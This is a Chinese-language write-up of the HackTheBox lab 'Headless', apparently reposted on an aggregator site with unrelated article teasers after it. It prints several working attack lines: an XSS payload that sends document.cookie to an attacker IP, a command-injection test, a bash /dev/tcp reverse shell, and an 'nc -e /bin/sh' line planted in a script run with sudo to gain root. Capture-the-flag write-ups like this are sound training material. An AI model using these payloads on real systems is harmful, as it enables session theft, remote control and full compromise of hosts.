HackTheBox--Headless

Headless测试过程

1 信息收集

NMAP端口扫描

nmap -sSCV 10.10.11.8

在这里插入图片描述

5000端口测试

在这里插入图片描述

检查页面功能,请求 For questions 功能,跳转到 /support 目录

在这里插入图片描述

目录扫描

发现 /dashboard 目录
在这里插入图片描述

访问 /dashboard 目录,显示未认证,如果通过认证,/dashboard 目录下的功能点可能存在利用点,想办法获取 cookie
在这里插入图片描述


2 利用 XSS 获取 cookie

在这里插入图片描述

在HttpOnly不启用时,就可能通过 XSS 漏洞获取 cookie,/support 页面 可以进行用户输入,尝试利用此页面进行 XSS 攻击测试

# payload
<script>var i=new Image(); i.src="http://10.10.14.171:8081/?cookie="+btoa(document.cookie);</script>

在这里插入图片描述

本地服务器获取到返回的 cookie,base64 加密,进行解密

在这里插入图片描述

替换获取到的 cookie,刷新 http://10.10.11.8:5000/dashboard 页面

在这里插入图片描述

点击 Generate Report,抓包观察,既然可以通过日期进行查询,那可以测试是否可以拼接系统命令执行

在这里插入图片描述

拼接 ;id,执行成功
在这里插入图片描述

3 命令执行获取权限

执行命令方法 1

/bin/bash -c 'exec bash -i >& /dev/tcp/10.10.14.171/4444 0>&1'

对反弹 shell 命令进行 URL 编码
在这里插入图片描述

执行命令方法 2

在这里插入图片描述

本地需要开启 http.server 服务
在这里插入图片描述

在这里插入图片描述

在这里插入图片描述


4 权限提升

# 检查当前用户拥有的权限
sudo -l

在这里插入图片描述

发现 /usr/bin/syscheck ,任何用户都可以无需密码执行,检查文件内容,initdb.sh 文件正在运行,那把命令写入 initdb.sh 文件,使用 sudo 执行即可获取 root 权限

在这里插入图片描述

echo  "nc -e /bin/sh 10.10.14.147 4445" > initdb.sh 
chmod +x initdb.sh
sudo /usr/bin/syscheck

在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/pingmian/42804.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

MySQL之备份与恢复和MySQL用户工具(一)

备份与恢复 备份脚本化 为备份写一些脚本是标准做法。展示一个示例程序&#xff0c;其中必定有很多辅助内容&#xff0c;这只会增加篇幅&#xff0c;在这里我们更愿意列举一些典型的备份脚本功能&#xff0c;展示一些Perl脚本的代码片段。你可以把这些当作可重用的代码块&…

图解 RocketMQ 架构

写在前面 Kafka、RocketMQ都是很出名的中间件&#xff0c;上次我们讲解了Kafka&#xff0c;这次我们来讲讲RocketMQ的原理。 基本架构图 解析 RocketMQ 总共可以分成四个模块 NameServer&#xff1a;提供服务发现和路由功能&#xff0c;管理各种元数据信息。Broker&#xf…

基于最大相邻夹角的边缘点提取(matlab)

1、背景介绍 边缘点是指点云数据中代表物体或场景几何形状突变的那些点。在三维点云中&#xff0c;边缘点通常标志着不同表面或物体的分界&#xff0c;或者是物体表面上的不规则性&#xff0c;如裂缝、棱角、突起等。点云边缘检测的作用非常重要&#xff0c;最常见是进行特征点…

php校园二手交易网站-计算机毕业设计源码041148

目 录 摘要 1 绪论 1.1 研究背景 1.2国内外研究现状 1.3论文结构与章节安排 2 校园二手交易网站系统分析 2.1 可行性分析 2.2 系统流程分析 2.2.1 数据流程 3.3.2 业务流程 2.3 系统功能分析 2.3.1 功能性分析 2.3.2 非功能性分析 2.4 系统用例分析 2.5本章小结…

AI学习指南机器学习篇-K均值聚类聚类数目选择

AI学习指南机器学习篇-K均值聚类聚类数目选择 在机器学习领域&#xff0c;K均值聚类是一种常用的无监督学习方法&#xff0c;用于将数据集分成K个类别。然而&#xff0c;选择适当的聚类数目K是一个常见的问题&#xff0c;因为不恰当的聚类数目选择可能导致聚类结果不理想。本文…

nginx配置代理

nginx配置代理 1. 安装并启动Nginx&#xff1a;2. 加载Nginx配置文件&#xff1a;3. 创建虚拟主机配置文件&#xff1a;4. 创建符号链接以启用虚拟主机&#xff1a;5. 检查配置文件语法是否正确&#xff1a;6. 重新加载Nginx配置&#xff1a;7. 配置反向代理&#xff1a;8. 高级…

MySQL安全加固

安全加固 禁止MySQL以管理员的身份账号权限运行 #用普通账户运行mysqld#加固方法&#xff1a; my.cnf配置文件中配置usermysql是否存在密码为空的用户 #1、sql_mode启用 NO_CREATE_AUTO_USER&#xff0c;这个参数&#xff08;NO_CREATE_AUTO_USER&#xff09;禁止自动创建密…

基于AOP的数据字典实现:实现前端下拉框的可配置更新

作者&#xff1a;后端小肥肠 创作不易&#xff0c;未经允许严禁转载。 目录 1. 前言 2. 数据字典 2.1. 数据字典简介 2.2. 数据字典如何管理各模块的下拉框 3. 数据字典核心内容解读 3.1. 表结构 3.2. 核心代码 3.2.1. 根据实体类名称获取下属数据字典 3.2.2. 数据字…

回顾 DTC 2024 大会——聚焦数据技术创新:揭秘下一代纯实时搜索引擎 INFINI Pizza

2024 年 4 月 12 日至 13 日&#xff0c;备受瞩目的第十三届“数据技术嘉年华”&#xff08;DTC2024&#xff09;在北京新云南皇冠假日酒店盛大开幕。本次大会由中国 DBA 联盟&#xff08;ACDU&#xff09;与墨天轮社区联合主办&#xff0c;以“智能云原生一体化——DB 与 AI 协…

在先企业字号被申请注册成商标!

今天一网友联系普推商标知产老杨&#xff0c;说自己注册的商标被某公司无效宣告了&#xff0c;去年联系老杨时&#xff0c;当时就给说这个商标名称存在风险&#xff0c;与别人的字号权存在高度近似&#xff0c;而且是同行业同地区在后面注册的。 十几年前某公司先成功注册成字号…

Ubuntu 安装CGAL

一、什么是CGAL CGAL&#xff08;Computational Geometry Algorithms Library&#xff09;是一个广泛使用的开源库&#xff0c;主要用于计算几何算法的实现。该库提供了一系列高效、可靠和易于使用的几何算法和数据结构&#xff0c;适用于各种应用领域。以下是 CGAL 的主要功能…

postcss-pxtorem

postcss-pxtorem屏幕自适应 //安装插件 npm install postcss postcss-pxtorem --save-dev//在根目录中新增postcss.config.cjs或postcss.config.js文件&#xff0c;并写上如下代码 module.exports {plugins: {"postcss-pxtorem": {rootValue: 16,selectorBlackList…

如何利用Java Stream API简化集合操作?

如何利用Java Stream API简化集合操作&#xff1f; 大家好&#xff0c;我是微赚淘客系统3.0的小编&#xff0c;也是冬天不穿秋裤&#xff0c;天冷也要风度的程序猿&#xff01; Java Stream API是Java 8引入的一种新的抽象概念&#xff0c;用于对集合对象进行函数式风格的操作…

算力共享和联邦学习的关系

目录 算力 共享和联邦学习的关系 算力共享 联邦学习 算力共享与联邦学习的关系 算力 共享和联邦学习的关系 算力共享和联邦学习之间存在着紧密的关系,它们都是现代数据处理和机器学习领域中的重要概念,尤其在处理大规模数据和保护数据隐私方面发挥着关键作用。 算力共享…

JD-GUI下载和使用

JD-GUI是专门查看jar包的&#xff0c;包括source.jar和doc.jar。JD-GUI可以把.class文件反编译为可编辑的.java文件&#xff0c;有图形化界面。 github下载地址&#xff1a;https://github.com/java-decompiler/jd-gui/releases 下载windows版本的zip包&#xff0c;如下图&…

智能化代码审查系统设计

设计一个智能化代码审查系统&#xff0c;特别是针对Java开发&#xff0c;需要综合考虑多个维度来提升代码质量、提高审查效率&#xff0c;并促进团队间的协作。以下是该系统设计的关键要素和功能特性&#xff1a; 系统架构 客户端-服务器架构&#xff1a;前端提供友好的Web界面…

2477. 到达首都的最少油耗

Problem: 2477. 到达首都的最少油耗 文章目录 思路解题过程复杂度Code 思路 为了解决这个问题&#xff0c;我们使用深度优先搜索&#xff08;DFS&#xff09;算法来遍历给定的树形结构。在这个过程中&#xff0c;我们维护两个数组&#xff0c;size 和 cost&#xff0c;分别用于…

破局 AI 2.0 时代:利用 AI 提升自我核心竞争力

文章目录 破局 AI 2.0 时代&#xff1a;利用 AI 提升自我核心竞争力1. AI 2.0 时代1.1 特点1.2 发展1.3 影响 2. AI 2.0 时代的机遇 & 挑战2.1 AI 对行业市场的冲击2.2 挑战变为机遇2.3 不同场景下的 AI 效能提升2.3.1 自动化办公任务2.3.2 提升学习效率2.3.3 创意生成与内…

Golang 网络编程socket+tcp+udp

Part 26 - 网络编程 网络编程分类 基于 TCP/IP 的 Socket编程基于 HTTP 的 HTTP 编程 端口 0是保留端口1-1024是知名端口 21&#xff1a;ftp22&#xff1a;ssh23&#xff1a;telnet24&#xff1a;smtp80&#xff1a;http 1025-65535是动态端口 Socket 的使用流程 服务端 监…

LabVIEW光谱测试系统

在现代光通信系统中&#xff0c;光谱分析是不可或缺的工具。开发了一种基于LabVIEW的高分辨率光谱测试系统&#xff0c;通过对可调谐激光器、可编程光滤波器和数据采集系统的控制&#xff0c;实现了高效、高精度的光谱测量。 项目背景 随着光通信技术的迅速发展&#xff0c;对…